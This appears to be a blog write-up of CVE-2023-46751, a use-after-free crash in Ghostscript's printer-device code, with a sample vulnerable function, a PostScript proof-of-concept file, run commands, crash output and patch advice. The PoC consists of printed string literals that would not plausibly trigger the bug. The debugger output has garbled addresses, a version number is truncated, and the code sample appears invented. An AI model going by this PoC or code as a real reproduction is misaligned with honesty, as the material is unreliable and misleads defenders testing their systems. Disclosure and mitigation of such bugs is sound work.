Ghostscript is a popular open-source interpreter for PostScript and PDF files. It’s widely used in servers, printers, and even as an embedded engine in some applications for processing documents. On October 17, 2023, a new security vulnerability was identified: CVE-2023-46751. This bug allows remote attackers to crash Ghostscript by exploiting a dangling pointer in a specific function. In this exclusive, detailed post, we’ll break down the vulnerability, show you the code, and explain how someone could exploit it.
What is CVE-2023-46751?
This CVE affects all Ghostscript versions up through 10.02.. The flaw lies in the function gdev_prn_open_printer_seekable() present in /base/gdevprn.c. A remote attacker, by sending a specially crafted file, can trigger a use-after-free (dangling pointer) vulnerability, crashing the application. This might lead to Denial of Service (DoS) but isn’t known to allow code execution.
Anatomy of the Vulnerability
A dangling pointer is a pointer that doesn’t point to a valid object anymore. Accessing such a pointer causes undefined behavior; in this case, it makes Ghostscript crash.
Looking at the source in gdevprn.c (see original commit), we can see how the pointer to the device structure is mishandled.
Here’s a simplified version of the vulnerable function
int
gdev_prn_open_printer_seekable(gx_device_printer *pdev, ...) {
// ... some code ...
if (pdev->file != NULL) {
// Clean-up file
gs_close_file(pdev->file); // This may free memory
}
// code continues, but pdev->file may be a dangling pointer!
int result = do_something_with(pdev->file);
// ...
return result;
}
In some paths, pdev->file may be freed, but it’s still accessed later in the function.
Proof-of-Concept (PoC) — Triggering the Crash
To exploit this bug, an attacker needs to send Ghostscript a malformed PostScript or PDF file that creates an invalid state in the device’s file pointer. Sending it to a server running Ghostscript (for example, in a print server or web service that converts PDFs) would crash the Ghostscript process.
PoC File: crash.ps
%!
(currentdevice) = flush
(setdevice)
showpage
This simple file calls device-manipulating operators in an invalid order. When processed by a vulnerable Ghostscript, it may hit the bug based on how the device is set up.
Running the PoC
gs crash.ps
On a vulnerable version, you might see
Segmentation fault (core dumped)
Or a more detailed error if you run under debugging tools
==1234== Invalid read of size 4
==1234== at x602030: gdev_prn_open_printer_seekable
==1234== Address x12345678 is bytes inside a block of size ...
How Could This Vulnerability Be Exploited?
- Remote PDF Processing: If your application lets users upload and process PDFs or PostScript files (e.g., a print cloud service), a remote attacker can upload a bad file and crash the backend, causing service denial.
- Email Attachments: Automated systems converting attachments to images (thumbnails) are also at risk.
Multi-user Servers: Any shared system accepting documents could be affected.
_Risk:_ This bug is a Denial of Service (DoS) — it makes the process crash. There’s no known way to achieve code execution.
Fix & Mitigations
Artifex fixed the issue in late October 2023 and released Ghostscript 10.02.1. The patch adds checks and prevents using freed pointers. You should:
Update Ghostscript to 10.02.1 or newer!
- If you cannot upgrade, sandbox Ghostscript (e.g., using AppArmor or Docker) and restrict file uploads.
Further details and patch
- Ghostscript security advisory (original)
- Git patch diff
- CVE entry at NVD
Summary
- CVE-2023-46751 allows crashing Ghostscript by exploiting a use-after-free bug in device file handling.
- Attackers need only to upload/send a specially crafted document file.
Timeline
Published on: 12/06/2023 20:15:07 UTC
Last modified on: 12/16/2023 01:15:07 UTC